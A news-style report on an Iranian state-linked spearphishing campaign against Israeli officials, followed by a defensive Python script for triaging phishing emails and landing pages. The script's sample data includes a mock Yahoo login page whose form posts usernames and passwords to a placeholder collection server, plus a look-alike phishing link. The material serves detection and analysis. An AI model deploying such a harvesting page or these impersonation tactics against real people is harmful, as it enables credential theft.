A group of hackers believed to be sponsored by the Iranian government has been running a spearphishing campaign that includes impersonating known government officials. According to the reports, the group posed as a former United States ambassador in order to target think tank officials.
The attackers gained access to one of the two targeted mailboxes by sending phishing messages in the name of the former US ambassador and picking up an existing, genuine email thread so that the messages looked like a continuation of a legitimate conversation.
The group's target list includes Israeli officials, the head of a leading security think tank, the former US ambassador to Israel, and high-ranking military personnel.
The researchers also named some of the individual targets: Tzipi Livni, a former Israeli deputy prime minister and foreign minister; an unidentified retired Israeli major general; a senior executive in the Israeli defence industry; and a member of one of Israel's leading security think tanks.
A former member of a well-known Middle Eastern research centre and an unnamed former US ambassador to Israel were also on the group's target list.
The campaign's spearphishing messages were sent both from fake accounts and from legitimate ones, including the mailbox the attackers had compromised. The attackers also used URL shorteners to disguise links and a Yahoo-themed phishing webpage built to harvest credentials.
Furthermore, the campaign abused a legitimate document-verification service to collect the targets' passport scans or ID documents. Another component of the attack was a credential-harvesting page disguised as an invitation to a well-known roundtable meeting.
Reports in Israel attribute the activity to the Phosphorus group, an Iranian government-affiliated cyberespionage actor also tracked as Newscaster Team, Magic Hound, Charming Kitten, and APT35.
The attribution rests on the campaign's primary targets, commented-out code left over from a previous Phosphorus campaign, and an Iranian IP address found in the source code of the Yahoo phishing page. The uncovered spearphishing infrastructure targets senior Israeli officials exclusively, and this kind of activity is expected to intensify as tensions between Iran and Israel persist.
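The two technical observations in this article (shortened links and a Yahoo look-alike credential page in the emails; leftover HTML comments and a hard-coded IP address in the phishing page's source) are exactly the pivots an analyst checks first when triaging such a message. The following is an added example written for this page, not code from the article or from any vendor report: it extracts URLs from a message body, flags URL-shortener hosts and Yahoo look-alike hosts, and pulls HTML comments and IPv4 literals out of a fetched page. The shortener list, the sample email, the sample page and the addresses in it (RFC 5737 documentation ranges) are all constructed for the example and imply nothing about the real campaign's infrastructure.

```python
"""Triage helpers for a spearphishing message and the landing page it links to.

Added example for this article; the shortener list and all sample inputs
are constructed here and are not indicators from the reported campaign.
"""
import re
from urllib.parse import urlparse

# Illustrative set of public URL shorteners; extend it from your own telemetry.
SHORTENER_HOSTS = {
    "bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly", "is.gd", "cutt.ly", "rb.gy",
}

# Genuine Yahoo domain; any other host that "looks like" Yahoo is treated as a look-alike.
GENUINE_YAHOO_DOMAINS = ("yahoo.com",)

URL_RE = re.compile(r"""https?://[^\s<>"')]+""", re.IGNORECASE)
HTML_COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)


def extract_urls(body: str) -> list[str]:
    """Return every http(s) URL found in a message body, in order of appearance."""
    return URL_RE.findall(body)


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def is_shortener(url: str) -> bool:
    """True when the link's host is a known public URL shortener."""
    return host_of(url) in SHORTENER_HOSTS


def is_yahoo_lookalike(url: str) -> bool:
    """True when the host imitates Yahoo but is not yahoo.com or a subdomain of it.

    Common digit-for-letter substitutions (0 for o, 1 for l) are normalised
    before the check so that e.g. 'yah00' is still caught.
    """
    host = host_of(url)
    if not host:
        return False
    for genuine in GENUINE_YAHOO_DOMAINS:
        if host == genuine or host.endswith("." + genuine):
            return False
    normalised = host.replace("0", "o").replace("1", "l")
    return "yahoo" in normalised


def triage_message(body: str) -> dict:
    """Classify every URL in a message; returns the lists an analyst wants to see."""
    urls = extract_urls(body)
    return {
        "urls": urls,
        "shorteners": [u for u in urls if is_shortener(u)],
        "lookalikes": [u for u in urls if is_yahoo_lookalike(u)],
    }


def analyze_page(html: str) -> dict:
    """Pull attribution pivots out of a phishing page's source.

    Leftover HTML comments often carry code from earlier campaigns, and
    hard-coded IPv4 literals point at the collection server the page posts to.
    """
    comments = [c.strip() for c in HTML_COMMENT_RE.findall(html)]
    ips = sorted(set(IPV4_RE.findall(html)))
    return {"comments": comments, "ips": ips}


# Constructed sample message: a follow-up on an existing thread with a shortened
# link and a Yahoo look-alike "re-verify your mailbox" link.
SAMPLE_EMAIL = """\
Following our last exchange, the updated roundtable agenda is here:
https://bit.ly/3abcXYZ
Please also re-verify your mailbox so the invitation reaches you: https://login.yah00-verify.example/auth?u=target
Regards"""

# Constructed sample page: a disabled block from an "old" campaign left in a
# comment, plus the collection endpoint hard-coded as an IP literal.
SAMPLE_PAGE = """<html><head><title>Yahoo - Sign in</title></head><body>
<!-- old campaign code, disabled -->
<form method="post" action="http://203.0.113.45/collect.php">
<input name="user"><input name="pass" type="password"><input type="submit">
</form>
<!-- var fallback = 'http://198.51.100.7/x'; -->
</body></html>"""


if __name__ == "__main__":
    print(triage_message(SAMPLE_EMAIL))
    print(analyze_page(SAMPLE_PAGE))
```

The look-alike check deliberately compares against the genuine domain before normalising, so `login.yahoo.com` passes while `yahoo.com.evil.example` (a genuine-looking prefix on an attacker-controlled suffix) is flagged; a production version would add homoglyph handling for Unicode and punycode hosts, which this example omits.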